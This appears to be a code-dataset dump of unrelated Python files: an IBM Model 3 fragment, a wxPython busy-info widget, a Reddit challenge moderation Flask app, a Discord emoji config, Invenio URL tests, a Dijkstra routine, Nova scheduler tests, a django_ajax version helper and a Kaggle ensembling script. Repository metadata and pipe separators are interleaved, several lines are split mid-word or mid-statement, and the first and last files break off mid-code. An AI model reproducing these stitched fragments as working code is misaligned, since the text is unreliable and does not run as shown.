Alignment([(0, 0), (1, 1), (2, 2), (3, None), (4, 3)])
"""
def __init__(self, sentence_aligned_corpus, iterations,
probability_tables=None):
"""
Train on ``sentence_aligned_corpus`` and create a lexical
translation model, a distortion model, a fertility model, and a
model for generating NULL-aligned words.
Translation direction is from ``AlignedSent.mots`` to
``AlignedSent.words``.
:param sentence_aligned_corpus: Sentence-aligned parallel corpus
:type sentence_aligned_corpus: list(AlignedSent)
:param iterations: Number of iterations to run training algorithm
:type iterations: int
:param probability_tables: Optional. Use this to pass in custom
probability values. If not specified, probabilities will be
set to a uniform distribution, or some other sensible value.
If specified, all the following entries must be present:
``translation_table``, ``alignment_table``,
``fertility_table``, ``p1``, ``distortion_table``.
See ``IBMModel`` for the type and purpose of these tables.
:type probability_tables: dict[str]: object
"""
super(IBMModel3, self).__init__(sentence_aligned_corpus)
self.reset_probabilities()
if probability_tables is None:
# Get translation and alignment probabilities from IBM Model 2
ibm2 = IBMModel2(sentence_aligned_corpus, iterations)
self.translation_table = ibm2.translation_table
self.alignment_table = ibm2.alignment_table
self.set_uniform_probabilities(sentence_aligned_corpus)
else:
# Set user-defined probabilities
self.translation_table = probability_tables['translation_table']
self.alignment_table = probability_tables['alignment_table']
self.fertility_table = probability_tables['fertility_table']
self.p1 = probability_tables['p1']
self.distortion_table = probability_tables['distortion_table']
for n in range(0, iterations):
self.train(sentence_aligned_corpus)
def reset_probabilities(self):
super(IBMModel3, self).reset_probabilities()
self.distortion_table = defaultdict(
lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(
lambda: self.MIN_PROB))))
"""
dict[int][int][int][int]: float. Probability(j | i,l,m).
Values accessed as ``distortion_table[j][i][l][m]``.
"""
def set_uniform_probabilities(self, sentence_aligned_corpus):
# d(j | i,l,m) = 1 / m for all i, j, l, m
l_m_combinations = set()
for aligned_sentence in sentence_aligned_corpus:
l = len(aligned_sentence.mots)
m = len(aligned_sentence.words)
if (l, m) not in l_m_combinations:
l_m_combinations.add((l, m))
initial_prob = 1 / float(m)
if i
|
garrettcap/Bulletproof-Backup
|
wx/lib/agw/pybusyinfo.py
|
Python
|
gpl-2.0
| 9,862 | 0.005983 |
"""
:class:`PyBusyInfo` constructs a busy info window and displays a message in it.
Description
===========
:class:`PyBusyInfo` constructs a busy info w
|
indow and displays a message in it.
This cla
|
ss makes it easy to tell your user that the program is temporarily busy.
Just create a :class:`PyBusyInfo` object, and within the current scope, a message window
will be shown.
For example::
busy = PyBusyInfo("Please wait, working...")
for i in xrange(10000):
DoACalculation()
del busy
It works by creating a window in the constructor, and deleting it in the destructor.
You may also want to call :func:`Yield` () to refresh the window periodically (in case
it had been obscured by other windows, for example).
Usage
=====
Usage example::
import wx
import wx.lib.agw.pybusyinfo as PBI
class MyFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, "PyBusyInfo Demo")
panel = wx.Panel(self)
b = wx.Button(panel, -1, "Test PyBusyInfo ", (50,50))
self.Bind(wx.EVT_BUTTON, self.OnButton, b)
def OnButton(self, event):
message = "Please wait 5 seconds, working..."
busy = PBI.PyBusyInfo(message, parent=self, title="Really Busy")
wx.Yield()
for indx in xrange(5):
wx.MilliSleep(1000)
del busy
# our normal wxApp-derived class, as usual
app = wx.App(0)
frame = MyFrame(None)
app.SetTopWindow(frame)
frame.Show()
app.MainLoop()
Supported Platforms
===================
:class:`PyBusyInfo` has been tested on the following platforms:
* Windows (Windows XP).
Window Styles
=============
`No particular window styles are available for this class.`
Events Processing
=================
`No custom events are available for this class.`
License And Version
===================
:class:`PyBusyInfo` is distributed under the wxPython license.
Latest Revision: Andrea Gavana @ 20 Mar 2012, 21.00 GMT
Version 0.2
"""
# Version Info
__version__ = "0.2"
import wx
_ = wx.GetTranslation
class PyInfoFrame(wx.Frame):
""" Base class for :class:`PyBusyInfo`. """
def __init__(self, parent, message, title, icon):
"""
Default class constructor.
:param `parent`: the frame parent;
:param `message`: the message to display in the :class:`PyBusyInfo`;
:param `title`: the main :class:`PyBusyInfo` title;
:param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`.
"""
wx.Frame.__init__(self, parent, wx.ID_ANY, title, wx.DefaultPosition,
wx.DefaultSize, wx.NO_BORDER|wx.FRAME_TOOL_WINDOW|wx.FRAME_SHAPED|wx.STAY_ON_TOP)
panel = wx.Panel(self)
panel.SetCursor(wx.HOURGLASS_CURSOR)
self._message = message
self._title = title
self._icon = icon
dc = wx.ClientDC(self)
textWidth, textHeight, dummy = dc.GetMultiLineTextExtent(self._message)
sizeText = wx.Size(textWidth, textHeight)
self.SetClientSize((max(sizeText.x, 340) + 60, max(sizeText.y, 40) + 60))
# need to size the panel correctly first so that text.Centre() works
panel.SetSize(self.GetClientSize())
# Bind the events to draw ourselves
panel.Bind(wx.EVT_PAINT, self.OnPaint)
panel.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase)
self.Centre(wx.BOTH)
# Create a non-rectangular region to set the frame shape
size = self.GetSize()
bmp = wx.EmptyBitmap(size.x, size.y)
dc = wx.BufferedDC(None, bmp)
dc.SetBackground(wx.Brush(wx.Colour(0, 0, 0), wx.SOLID))
dc.Clear()
dc.SetPen(wx.Pen(wx.Colour(0, 0, 0), 1))
dc.DrawRoundedRectangle(0, 0, size.x, size.y, 12)
r = wx.RegionFromBitmapColour(bmp, wx.Colour(0, 0, 0))
# Store the non-rectangular region
self.reg = r
if wx.Platform == "__WXGTK__":
self.Bind(wx.EVT_WINDOW_CREATE, self.SetBusyShape)
else:
self.SetBusyShape()
# Add a custom bitmap at the top (if any)
def SetBusyShape(self, event=None):
"""
Sets :class:`PyInfoFrame` shape using the region created from the bitmap.
:param `event`: a :class:`WindowCreateEvent` event (GTK only, as GTK supports setting
the window shape only during window creation).
"""
self.SetShape(self.reg)
if event:
# GTK only
event.Skip()
def OnPaint(self, event):
"""
Handles the ``wx.EVT_PAINT`` event for :class:`PyInfoFrame`.
:param `event`: a :class:`PaintEvent` to be processed.
"""
panel = event.GetEventObject()
dc = wx.BufferedPaintDC(panel)
dc.Clear()
# Fill the background with a gradient shading
startColour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_ACTIVECAPTION)
endColour = wx.WHITE
rect = panel.GetRect()
dc.GradientFillLinear(rect, startColour, endColour, wx.SOUTH)
# Draw the label
font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
dc.SetFont(font)
# Draw the message
rect2 = wx.Rect(*rect)
rect2.height += 20
dc.DrawLabel(self._message, rect2, alignment=wx.ALIGN_CENTER|wx.ALIGN_CENTER)
# Draw the top title
font.SetWeight(wx.BOLD)
dc.SetFont(font)
dc.SetPen(wx.Pen(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT)))
dc.SetTextForeground(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT))
if self._icon.IsOk():
iconWidth, iconHeight = self._icon.GetWidth(), self._icon.GetHeight()
dummy, textHeight = dc.GetTextExtent(self._title)
textXPos, textYPos = iconWidth + 10, (iconHeight-textHeight)/2
dc.DrawBitmap(self._icon, 5, 5, True)
else:
textXPos, textYPos = 5, 0
dc.DrawText(self._title, textXPos, textYPos+5)
dc.DrawLine(5, 25, rect.width-5, 25)
size = self.GetSize()
dc.SetPen(wx.Pen(startColour, 1))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRoundedRectangle(0, 0, size.x, size.y-1, 12)
def OnErase(self, event):
"""
Handles the ``wx.EVT_ERASE_BACKGROUND`` event for :class:`PyInfoFrame`.
:param `event`: a :class:`EraseEvent` event to be processed.
:note: This method is intentionally empty to reduce flicker.
"""
# This is empty on purpose, to avoid flickering
pass
# -------------------------------------------------------------------- #
# The actual PyBusyInfo implementation
# -------------------------------------------------------------------- #
class PyBusyInfo(object):
"""
Constructs a busy info window as child of parent and displays a message in it.
"""
def __init__(self, message, parent=None, title=_("Busy"), icon=wx.NullBitmap):
"""
Default class constructor.
:param `parent`: the :class:`PyBusyInfo` parent;
:param `message`: the message to display in the :class:`PyBusyInfo`;
:param `title`: the main :class:`PyBusyInfo` title;
:param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`.
:note: If `parent` is not ``None`` you must ensure that it is not closed
while the busy info is shown.
"""
self._infoFrame = PyInfoFrame(parent, message, title, icon)
if parent and parent.HasFlag(wx.STAY_ON_TOP):
# we must have this flag to be in front of our parent if it has it
self._infoFrame.SetWindowStyleFlag(wx.STAY_ON_TOP)
# Added for the screenshot-taking tool
self.Show()
def __del__(self):
""" Overloaded method, for compatibility with wxWidgets. """
self._infoFrame.Show(False)
self._infoFrame.Destroy()
|
HugoGuillen/nb2py
|
tutorial_files/custom.py
|
Python
|
mit
| 70 | 0.057143 |
#This is a cell with a custom comment as marker
x=10
y
|
=11
print
|
(x+y)
|
foobarbazblarg/stayclean
|
stayclean-2017-may/serve-challenge-with-flask.py
|
Python
|
mit
| 10,823 | 0.003326 |
#!/usr/bin/python
# TODO: issues with new oauth2 stuff. Keep using older version of Python for now.
# #!/usr/bin/env python
import subprocess
import praw
import datetime
import pyperclip
from hashlib import sha1
from flask import Flask
from flask import Response
from flask import request
from cStringIO import StringIO
from base64 import b64encode
from base64 import b64decode
from ConfigParser import ConfigParser
import OAuth2Util
import os
import markdown
import bleach
# encoding=utf8
import sys
from participantCollection import ParticipantCollection
reload(sys)
sys.setdefaultencoding('utf8')
# Edit Me!
challengePageSubmissionId = '68lss2'
flaskport = 8891
thisMonthName = "May"
nextMonthName = "June"
readAllCommentsWhichCanBeSlower = False
sorryTooLateToSignUpReplyText = "Sorry, but the late signup grace period for " + thisMonthName + " is over, so you can't officially join this challenge. But feel free to follow along anyway, and comment all you want. And be sure to join us for the " + nextMonthName + " challenge. Signup posts for " + nextMonthName + " will begin during the last week of " + thisMonthName + "."
reinstatedReplyText = "OK, I've reinstated you. You should start showing up on the list again starting tomorrow."
app = Flask(__name__)
app.debug = True
commentHashesAndComments = {}
submission = None
def loginAndReturnRedditSession():
config = ConfigParser()
config.read("../reddit-password-credentials.cfg")
user = config.get("Reddit", "user")
password = config.get("Reddit", "password")
# TODO: password auth is going away, and we will soon need to do oauth.
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
redditSession.login(user, password, disable_warning=True)
# submissions = redditSession.get_subreddit('pornfree').get_hot(limit=5)
# print [str(x) for x in submissions]
return redditSession
def loginOAuthAndReturnRedditSession():
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
o = OAuth2Util.OAuth2Util(redditSession, print_log=True, configfile="../reddit-oauth-credentials.cfg")
# TODO: Testing comment of refresh. We authenticate fresh every time, so presumably no need to do o.refresh().
# o.refresh(force=True)
return redditSession
def getSubmissionForRedditSession(redditSession):
submission = redditSession.get_submission(submission_id=challengePageSubmissionId)
if readAllCommentsWhichCanBeSlower:
submission.replace_more_comments(limit=None, threshold=0)
return submission
def getCommentsForSubmission(submission):
return [comment for comment in praw.helpers.flatten_tree(submission.comments) if comment.__class__ == praw.objects.Comment]
def retireCommentHash(commentHash):
with open("retiredcommenthashes.txt", "a") as commentHashFile:
commentHashFile.write(commentHash + '\n')
def retiredCommentHashes():
with open("retiredcommenthashes.txt", "r") as commentHashFile:
# return commentHashFile.readlines()
return commentHashFile.read().splitlines()
@app.route('/moderatechallenge.html')
def moderatechallenge():
currentDayOfMonthIndex = datetime.date.today().day
lateCheckinGracePeriodIsInEffect = currentDayOfMonthIndex <= 3
global commentHashesAndComments
global submission
commentHashesAndComments = {}
stringio = StringIO()
stringio.write('<html>\n<head>\n</head>\n\n')
# redditSession = loginAndReturnRedditSession()
redditSession = loginOAuthAndReturnRedditSession()
submission = getSubmissionForRedditSession(redditSession)
flat_comments = getCommentsForSubmission(submission)
retiredHashes = retiredCommentHashes()
i = 1
stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n')
stringio.write("<h3>")
stringio.write(os.getcwd())
stringio.write("<br>\n")
stringio.write(submission.title)
stringio.write("</h3>\n\n")
stringio.write('<form action="copydisplaytoclipboard.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" name="actiontotake" value="Copy disp
|
lay.py stdout to clipboard">')
stringio.write('<input type="submit" name="actiontotake" value="Automatically post display.py stdout">')
stringio.wri
|
te('</form>')
stringio.write('<form action="updategooglechart.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" value="update-google-chart.py">')
stringio.write('</form>')
for comment in flat_comments:
# print comment.is_root
# print comment.score
i += 1
commentHash = sha1()
commentHash.update(comment.permalink)
commentHash.update(comment.body.encode('utf-8'))
commentHash = commentHash.hexdigest()
if commentHash not in retiredHashes:
commentHashesAndComments[commentHash] = comment
authorName = str(comment.author) # can be None if author was deleted. So check for that and skip if it's None.
participant = ParticipantCollection().participantNamed(authorName)
stringio.write("<hr>\n")
stringio.write('<font color="blue"><b>')
stringio.write(authorName)
stringio.write('</b></font><br>')
if ParticipantCollection().hasParticipantNamed(authorName):
stringio.write(' <small><font color="green">(member)</font></small>')
if participant.isStillIn:
stringio.write(' <small><font color="green">(still in)</font></small>')
else:
stringio.write(' <small><font color="red">(out)</font></small>')
if participant.hasCheckedIn:
stringio.write(' <small><font color="green">(checked in)</font></small>')
else:
stringio.write(' <small><font color="orange">(not checked in)</font></small>')
if participant.hasRelapsed:
stringio.write(' <small><font color="red">(relapsed)</font></small>')
else:
stringio.write(' <small><font color="green">(not relapsed)</font></small>')
else:
stringio.write(' <small><font color="red">(not a member)</font></small>')
stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">')
if lateCheckinGracePeriodIsInEffect:
stringio.write('<input type="submit" name="actiontotake" value="Checkin">')
stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin" style="color:white;background-color:green">')
else:
stringio.write('<input type="submit" name="actiontotake" value="Checkin" style="color:white;background-color:green">')
stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">')
stringio.write('<input type="submit" name="actiontotake" value="Relapse" style="color:white;background-color:red">')
stringio.write('<input type="submit" name="actiontotake" value="Reinstate with automatic comment">')
stringio.write('<input type="submit" name="actiontotake" value="Reply with sorry-too-late comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">')
stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">')
stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">')
stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">')
stringio.write('</form>')
stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p']))
stringio.write("\n<br><br>\n\n")
stringio.write('</html>')
pageString = stringio.getvalue()
stringio.close()
return Response(pageString, mimetype='text/html')
@app.rout
|
Ikusaba-san/Chiaki-Nanami
|
emojistemplate.py
|
Python
|
mit
| 2,702 | 0.00037 |
"""Config file for the emojis that Chiaki will use.
RENAME THIS FILE TO emojis.py OTHERWISE IT WON'T WORK.
By default it uses the unicode emojis. However, you can specify
server emojis in one of the two possible ways:
1. The raw string of the emoji. This is the format <:name:id>. You can find this
by placing a backslash before the emoji.
2. The ID of the emoji. This must be an integer. And can be shown through the
same method.
Note that bots have "nitro" status when it comes to emojis. So as long as
it's in the server that has the custom emoji, the bot can use it on any other
server it's in.
"""
# ------- Confirmation emojis (for Context.ask_confirmation) -------
# Confirm option
confirm = '\N{WHITE HEAVY CHECK MARK}'
# Deny Option
deny = '\N{CROSS MARK}'
# ------- Status emojis (for various info commands) ----------------
online = '\N{GREEN HEART}'
idle = '\N{YELLOW HEART}'
dnd = '\N{HEAVY BLACK HEART}'
offline = '\N{BLACK HEART}'
streaming = '\N{PURPLE HEART}'
bot_tag = '\N{ROBOT FACE}'
# ------- Currency Emoji -------------
money = '\N{BANKNOTE WITH DOLLAR SIGN}'
# ------ Numbers -----
# Right now it uses the default key-caps
# However, you may specify custom emojis if needed
#
# Note: The numbers are what *Discord sees them as*. Technically the
# actual keycap number emoji would be {number}\ufe0f\u20e3. But discord
# instead sends it as {number}\u20e3 (without the \ufe0f). Do not add the
# \fe0f in, otherwise it won't send as an actual number.
numbers = [
f'{n}\u20e3' for n in range(10)
]
# ------- Minesweeper -------
# Not an emoji per se but set to True i
|
f you want to be able to use external
# emojis for Minesweeper. This only applies to Mineswe
|
eper as this changes
# the control scheme if she's able to use external emojis.
#
# Note that if Chiaki doesn't have Use External Emojis she'll be forced to
# use the default control scheme by default.
msw_use_external_emojis = False
msw_y_row = [
# Should have emojis representing 1-17.
# If you set msw_use_external_emojis to True this *must* be filled.
]
msw_letters = [
# Should have emojis representing A-Q or some equivalent.
# If you set msw_use_external_emojis to True this *must* be filled.
]
# ------ Connect-Four -------
c4_winning_tiles = [
'\N{HEAVY BLACK HEART}',
'\N{BLUE HEART}'
]
# ------- Sudoku ------
sudoku_clues = [
f'{n}\u20e3' for n in range(1, 9)
]
# ------- Checkers -------
checkers_black_king = '\N{HEAVY BLACK HEART}'
checkers_white_king = '\N{BLUE HEART}'
checkers_black_last_move = ''
checkers_white_last_move = ''
# -------- Shards ---------
shard_connecting = ''
shard_online = ''
shard_disconnecting = ''
shard_offline = ''
|
jmartinm/invenio
|
modules/miscutil/lib/urlutils_unit_tests.py
|
Python
|
gpl-2.0
| 18,616 | 0.004835 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for the urlutils library."""
__revision__ = "$Id$"
from invenio.testutils import InvenioTestCase
from cgi import parse_qs
from invenio.config import CFG_SITE_URL
from invenio.testutils import make_test_suite, run_test_suite
from invenio.urlutils import (create_AWS_request_url,
string_to_numeric_char_reference,
make_canonical_urlargd,
create_html_link,
create_html_mailto,
same_urls_p,
HASHLIB_IMPORTED,
wash_url_argument,
create_url,
create_Indico_request_url,
get_relative_url)
class TestWashUrlArgument(InvenioTestCase):
def test_wash_url_argument(self):
"""urlutils - washing of URL arguments"""
self.assertEqual(1,
wash_url_argument(['1'], 'int'))
self.assertEqual("1",
wash_url_argument(['1'], 'str'))
self.assertEqual(['1'],
wash_url_argument(['1'], 'list'))
sel
|
f.assertEqual(0,
wash_url_argument('ellis', 'int'))
self.assertEqual("ellis",
wash_url_argument('ellis', 'str'))
self.assertEqual(["ellis
|
"],
wash_url_argument('ellis', 'list'))
self.assertEqual(0,
wash_url_argument(['ellis'], 'int'))
self.assertEqual("ellis",
wash_url_argument(['ellis'], 'str'))
self.assertEqual(["ellis"],
wash_url_argument(['ellis'], 'list'))
class TestUrls(InvenioTestCase):
"""Tests on URLs"""
def test_url_creation(self):
"""urlutils - test url creation"""
self.assertEqual(create_url('http://www.a.com/search',
{'recid':3, 'of':'hb&'},
escape_urlargd=True),
'http://www.a.com/search?of=hb%26&recid=3')
self.assertEqual(create_url('http://www.a.com/search',
{'recid':3, 'of':'hb&'},
escape_urlargd=False),
'http://www.a.com/search?of=hb&&recid=3')
def test_canonical_urlargd_creation(self):
"""urlutils - test creation of canonical URLs"""
self.assertEqual(make_canonical_urlargd({'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?&'},
{'a': ('int', 1),
'b': ('str', 2)}),
"?b%26=2%3D&%3A=%3F%26&b=2")
if HASHLIB_IMPORTED:
def test_signed_aws_request_creation(self):
"""urlutils - test creation of signed AWS requests"""
signed_aws_request_url = create_AWS_request_url("http://webservices.amazon.com/onca/xml",
{'AWSAccessKeyId': '00000000000000000000',
'Service': 'AWSECommerceService',
'Operation': 'ItemLookup',
'ItemId': '0679722769',
'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews',
'Version': '2009-01-06'},
"1234567890",
_timestamp="2009-01-01T12:00:00Z")
# Are we at least acccessing correct base url?
self.assert_(signed_aws_request_url.startswith("http://webservices.amazon.com/onca/xml"))
# Check that parameters with special characters (, :) get correctly
# encoded/decoded
## Note: using parse_qs() url-decodes the string
self.assertEqual(parse_qs(signed_aws_request_url)["ResponseGroup"],
['ItemAttributes,Offers,Images,Reviews'])
self.assert_('ItemAttributes%2COffers%2CImages%2CReviews' \
in signed_aws_request_url)
self.assertEqual(parse_qs(signed_aws_request_url)["Timestamp"],
['2009-01-01T12:00:00Z'])
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_aws_request_url)["Signature"],
['Nace+U3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg='])
self.assert_('Nace%2BU3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg%3D&Operation' \
in signed_aws_request_url)
# Continute with an additional request
signed_aws_request_url_2 = \
create_AWS_request_url("http://ecs.amazonaws.co.uk/onca/xml",
{'AWSAccessKeyId': '00000000000000000000',
'Actor': 'Johnny Depp',
'AssociateTag': 'mytag-20',
'Operation': 'ItemSearch',
'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews,Variations',
'SearchIndex': 'DVD',
'Service': 'AWSECommerceService',
'Sort': 'salesrank',
'Version': '2009-01-01'},
"1234567890",
_timestamp="2009-01-01T12:00:00Z")
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_aws_request_url_2)["Signature"],
['TuM6E5L9u/uNqOX09ET03BXVmHLVFfJIna5cxXuHxiU='])
def test_signed_Indico_request_creation(self):
"""urlutils - test creation of signed Indico requests"""
signed_Indico_request_url = create_Indico_request_url("https://indico.cern.ch",
"categ",
"",
[1, 7],
"xml",
{'onlypublic': 'yes',
'order': 'title',
'from': 'today',
'to': 'tomorrow'},
'00000000-0000-0000-0000-000000000000',
'00000000-0000-0000-0000-000000000000',
_timestamp=1234)
# Are we at least acccessing correct base url?
self.assert_(signed_Indico_request_url.startswith("https://indico.cern.ch/export/
|
ddeepak6992/Algorithms
|
Graph/Dijkstra.py
|
Python
|
gpl-2.0
| 935 | 0.019251 |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 19:41:46 2015
@author: deep
"""
from graph import weightedGraph
import heapq
def djikstra(a,S):
N = len(a.adjLst)
Visited = [False for i in xrange(N)]
Distance = [float('inf') for i in xrange(N)]
Distance[S] = 0
heap = []
heapq.heappush(heap,(0,S))
for i in xrange(N):
if heap:
while(True):
_,u = heapq.heappop(heap)
if not Visited[u]:
break
Visited[u] = True
for weight_uv,v in a.adjLst[u]:
if not
|
Visited[v]:
if Distance[v] > Distance[u] + weight_uv:
Distance[v] = Distance[u] + weight_uv
heapq.heappush(heap, (Distance[v],v))
print Distance
return Distance
g = weightedGraph(
|
4)
g.addEdge(0,1,1)
g.addEdge(1,2,2)
g.addEdge(2,3,3)
g.addEdge(3,0,4)
djikstra(g,0)
|
Brocade-OpenSource/OpenStack-DNRM-Nova
|
nova/tests/scheduler/test_scheduler_options.py
|
Python
|
apache-2.0
| 5,241 | 0.001145 |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For PickledScheduler.
"""
import datetime
import StringIO
from nova.openstack.common import jsonutils
from nova.scheduler import scheduler_options
from nova import test
class FakeSchedulerOptions(scheduler_options.SchedulerOptions):
def __init__(self, last_checked, now, file_old, file_now, data, filedata):
super(FakeSchedulerOptions, self).__init__()
# Change internals ...
self.last_modified = file_old
self.last_checked = last_checked
self.data = data
# For overrides ...
self._time_now = now
self._file_now = file_now
self._file_data = filedata
self.file_was_loaded = False
def _get_file_timestamp(self, filename):
return self._file_now
def _get_file_handle(self, filename):
self.file_was_loaded = True
return StringIO.StringIO(self._file_data)
def _get_time_now(self):
return self._time_now
class SchedulerOptionsTestCase(test.NoDBTestCase):
def test_get_configuration_first_time_no_flag(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals({}, fake.get_configuration())
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_first_time_empty_file(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
jdata = ""
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals({}, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_first_time_happy_day(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_second_time_no_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
data, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_too_fast(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2011, 1, 1, 1, 1, 2)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEquals(old_data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now
|
= datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEqu
|
als(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
|
RyanNoelk/ClanLadder
|
django_ajax/__init__.py
|
Python
|
mit
| 1,900 | 0 |
"""
Init
"""
from __future__ import unicode_literals
import datetime
import os
import subprocess
VERSION = (2, 2, 13, 'final', 0)
def get_version(version=None):
"""
Returns a PEP 386-compliant version number from VERSION.
"""
if not version:
version = VERSION
else:
assert len(version) == 5
assert version[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if version[2] == 0 else 3
main = '.'.join(str(x) for x in version[:parts])
sub = ''
if version[3] == 'alpha' and version[4] == 0:
git_changeset = get_git_changeset()
if git_changeset:
sub = '.dev%s' % git_changeset
elif version[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[version[3]] + st
|
r(version[4])
return str(main + sub)
def get_git_changeset():
"""
Returns a numeric identifier of the latest git changeset.
The result is the UTC timestamp of the changeset in YYYYMMDDHHMMSS format.
This value isn't guaranteed to be unique, but collisions are very unlikely,
so it's suff
|
icient for generating the development version numbers.
"""
repo_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
git_log = subprocess.Popen('git log --pretty=format:%ct --quiet -1 HEAD',
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, cwd=repo_dir,
universal_newlines=True)
timestamp = git_log.communicate()[0]
try:
timestamp = datetime.datetime.utcfromtimestamp(int(timestamp))
except ValueError:
return None
return timestamp.strftime('%Y%m%d%H%M%S')
|
ldamewood/kaggle
|
facebook/combine.py
|
Python
|
mit
| 1,058 | 0.005671 |
# -*- coding: utf-8 -*-
import pandas as pd
from itertools import izip
import numpy as np
import glob
from facebook import FacebookCompetition
print('Loading test data')
bids = pd.read_csv(FacebookCompetition.__data__['bids'])
test = pd.read_csv(FacebookCompetition.__data__['test'])
te = pd.merge(test, bids, how='left')
del bids
files = glob.glob('data/facebook.te.*.txt.gz')
its = [iter(pd.read_table(f, header=-1, iterator=True, chunksize=2**15, compression='gzip')) for f in files]
#with open('data/facebook_softmax_20150506.csv', 'w') as out:
c = []
for i,chunks in enumerate(izip(*its)):
print(i)
A = np.array([np.c_[chunk.values,1-chunk.values] for chunk in chunks])
A = np.exp(np.log(A).mean(axis=0))
A /
|
= A.sum(axis=1)[:, np.newaxis]
A = A[:,0]
df = pd.DataFrame(A)
df.index = chunks[0].index
